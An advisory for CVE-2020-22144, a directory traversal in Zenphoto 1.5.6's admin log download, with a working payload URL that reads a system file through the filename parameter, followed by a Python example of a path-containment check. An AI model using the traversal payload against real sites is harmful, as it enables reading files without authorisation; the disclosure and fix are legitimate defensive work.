CVE-2020-22144
An issue in /zp-core/admin-logs.php of Zenphoto 1.5.6 allows attackers to perform a directory traversal and read arbitrary log files.
Description:
The admin log download function accepts a caller-supplied file name without confining it to the log directory, so it can be used to download files from the local system that it was never meant to expose.
Details:
File: /zp-core/admin-logs.php
Parameter: filename
Payload:
/zp-core/admin-logs.php?action=download_log&page=logs&tab=setup&filename=../../../../../../../../../var/log/alternatives&XSRFToken=bcf89608fdaaa5e293ccd5f83d1614f05bfcbaae
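As an added illustration (not Zenphoto's code or its actual patch), the following Python shows the containment check a log download handler needs: the requested name is rejected when it carries path separators, an encoded traversal, or a NUL byte, and the resolved path must still sit directly inside the log directory so that symlinks cannot escape it either. The `.log` suffix restriction and the `zp-data` directory name are assumptions made for the demo.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_log_download(log_dir, filename):
    """Return the absolute path of the requested log file only if it resolves
    inside log_dir; return None for anything else.

    This is the check the vulnerable handler lacks: the filename parameter is
    attacker-controlled and must not be allowed to leave the log directory.
    """
    # Decode once so %2e%2e%2f style encodings are treated as traversal too.
    requested = unquote(filename)
    # Log files live flat in log_dir, so only a bare file name is valid;
    # a NUL byte is rejected to defeat truncation tricks.
    if "\x00" in requested or "/" in requested or "\\" in requested:
        return None
    # Assumption for the demo: only *.log files are downloadable.
    if not requested.endswith(".log"):
        return None
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # Containment check on the resolved path: this also rejects a symlink
    # inside log_dir that points somewhere else on the filesystem.
    if os.path.dirname(candidate) != base or not os.path.isfile(candidate):
        return None
    return candidate


def make_demo_log_dir():
    """Constructed test fixture: a log directory with one real log file and a
    symlink that points outside it, plus a secret file elsewhere."""
    root = tempfile.mkdtemp()
    log_dir = os.path.join(root, "zp-data")  # assumed directory name
    os.mkdir(log_dir)
    with open(os.path.join(log_dir, "setup.log"), "w") as f:
        f.write("constructed setup log\n")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("outside the log directory\n")
    try:
        os.symlink(secret, os.path.join(log_dir, "leak.log"))
    except OSError:
        pass  # platforms without symlink support still exercise the rest
    return log_dir


if __name__ == "__main__":
    d = make_demo_log_dir()
    print(resolve_log_download(d, "setup.log"))  # allowed
    print(resolve_log_download(d, "../../../../../../../../../var/log/alternatives"))  # None
```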
PoC: